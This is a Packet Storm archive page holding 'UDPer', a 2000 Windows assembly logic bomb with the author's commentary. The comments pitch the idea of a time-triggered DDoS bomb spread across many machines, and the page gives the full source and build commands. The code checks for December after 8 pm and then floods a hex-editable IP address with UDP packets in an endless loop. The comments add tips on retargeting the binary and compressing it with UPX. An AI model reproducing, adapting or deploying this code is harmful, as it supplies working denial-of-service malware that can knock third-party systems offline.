UDPer is a logic bomb written in ASM for Windows which floods a victim with packets at a certain date.
51b9a0b285efad03f7affe599d3191b523a7c8d338e58191576976773663182a; Frost_Byte [S/I] Saturday, July 22nd, 2000
;---------------Main Ramblings---------------
; The following code is a demonstration of an idea in which I have
; had for quite awhile, but never felt like sitting down and typing
; out. One of the problems with the DDOS servers is that commands are
; sent back and forth, but what if the Logic Bomb ideals were used to
; make basically a "ticking timebomb" ready to pounce on a site when
; certain conditions are met? The further away the attack is set...the
; more systems would be aquired. In turn, the longer the binaries are
; floating about, there is a higher probability that the code will be
; found and preventative measures will be taken. All I am doing is presenting
; this idea and a simple demonstartion. The file loads, checks to see if
; it is December, and after 10:00 pm. If so...the attack insues. It sends
; 10 1K packets (which are the first 1K of the Executible itself..just for
; kicks, heh). Then, the program waits 30 seconds, and tries again. At
; any error (such as not being able to initialize winsock) it jumps to the 30
; second wait. Basically, the program contenously loops until the process is
; killed. I incorporated no API-call hiding, Re-starting on boot, or Process
; hiding methods...this is just proof of what could be done. Also, by the
; allocating of bytes..one EXE can be hexedited for a different IP to attack,
; and the file can be compressed (UPX threw it down to about 3K). This was tried
; on my Winnt 4 box to attack a Linux box over my LAN, and it seemed relatively
; stable and wasn't a real RAM-hog. BTW...hope you enjoy the commenting...
;-------------Hello Hello-------------
; I'm going to give a hello to Miss Ashley, A^T (thanks for catching a packet for me),
; and to my new gf Miss Jill.
;-------------Up-and-coming items-------------
; Have a Binder/Stup about 75% complete that has a 2-4K stub....a Commandprompt redirector
; in TASM, and other numberous odds and ins....
;-------------Outwards Out Words....-------------
; I'd just like to thank you for atleast looking at this article, and I look foward to
; bringing more ideas to light. Later oh...
;-----Compiling-----
; tasm /mx /m1 UDPer
; tlink32 -Tpe -aa -c -x UDPer,,,import32.lib
;------------------------------------------------------------------------------------
;--------------------------------------The-Code--------------------------------------
;------------------------------------------------------------------------------------
.386
locals
jumps
.model Flat ,StdCall
;----------\Structures\----------
WSAdata STRUC
wVersion dw ?
wHighVersion dw ?
szDescription db ?
szSystemStatus db ?
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?,?
WSAdata ENDS
sockaddr_in STRUC
sin_family dw ?
sin_port dw ?
sin_addr dd 0
sin_zero db 8 dup (0)
sockaddr_in ENDS
SYSTEMTIME STRUC
wYear dw ?
wMonth dw ?
wDayOfWeek dw ?
wDay dw ?
wHour dw ?
wMinute dw ?
wSecond dw ?
wMilliseconds dw ?
SYSTEMTIME ENDS
;----------/Structures/----------
;----------\API Declarations\----------
; API for Logic Bomb data
extrn GetLocalTime:PROC
extrn Sleep:PROC
; Winsock API calls
extrn WSAStartup:PROC
extrn WSACleanup:PROC
extrn htons:PROC
extrn bind:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn sendto:PROC
extrn closesocket:PROC
;----------/API Declarations/----------
.Data
;----------\Winsock-used Data\----------
WSAdats WSADATA ?
sin1 sockaddr_in ?
sin2 sockaddr_in ?
INADDR_ANY equ 000000000h
sockaddr_size equ 010h
saddr_len dw 16
MySocket dd 0
;----------/Winsock-used Data/----------
MySysTime SYSTEMTIME ?
AttackedAddr db '127.0.0.1' ; Localhost, but leave enough nulls afterwhich
db 7 dup (0) ; so that the IP can be hexedited
; xxx.xxx.xxx.xxx+NULL allocated
.Code
Start_Code:
startsocks:
;----------\Socket initialization & Configuration\----------
call WSAStartup, 0202h, offset WSAdats ; Intialize Winsock
cmp eax,-1
jz error
call socket, 002h, 002h, 011h ; Socket ( AF_INET , SOCK_DGRAM , IPPROTO_UDP)
test eax,eax
jb error
mov MySocket, eax
call htons, eax ; Set up Local Socket & Bind the settings
mov [sin1.sin_port],ax ; Using the current socket handle as the source
mov [sin1.sin_family],002h ; port for abit of randomness
mov [sin1.sin_addr],INADDR_ANY
call bind, MySocket, offset sin1, sockaddr_size
cmp eax,-1
jz error
call htons, 200 ; Set up Local Socket & Bind the settings
mov [sin2.sin_port],ax ; Using the current socket handle as the source
mov [sin2.sin_family],002h ; port for abit of randomness
call inet_addr, offset AttackedAddr
mov [sin2.sin_addr],eax
;----------/Socket initialization & Configuration/----------
;----------\Logic Bomb\----------
call GetLocalTime, offset MySysTime
cmp MySysTime.wMonth, 12 ; Is it the 12th month (Dec)?
jnz error ; If not..let's stop
cmp MySysTime.wHour, 20 ; Is it 10:00pm or later?
jle error ; If not..let's stop
;----------/Logic Bomb/----------
;----------\The UDP Bomb\----------
xor ecx,ecx
Looper:
inc ecx
push ecx
call sendto, MySocket, offset Start_Code, 1024, 0, offset sin2, sockaddr_size ; Long call for
cmp eax,-1 ; the UDP send
jz error
call Sleep, 500 ; Good to keep a modem from dying
pop ecx
cmp ecx,10
jnz Looper ; Send 10 packets (packet is just the
; first 1K of this program...saves some
; bytes instead of using a constant
; string)
;----------\The UDP Bomb\----------
error:
call closesocket, MySocket
call WSAcleanup
call Sleep, 30000 ; Sleep to keep modems from flooding
jmp startsocks ; themselves off and to keep traffic
End Start_Code ; from being too outlandish
End
;-------------------------------------------------------------------------------
;-------------------------------------------------------------------------------
;-------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed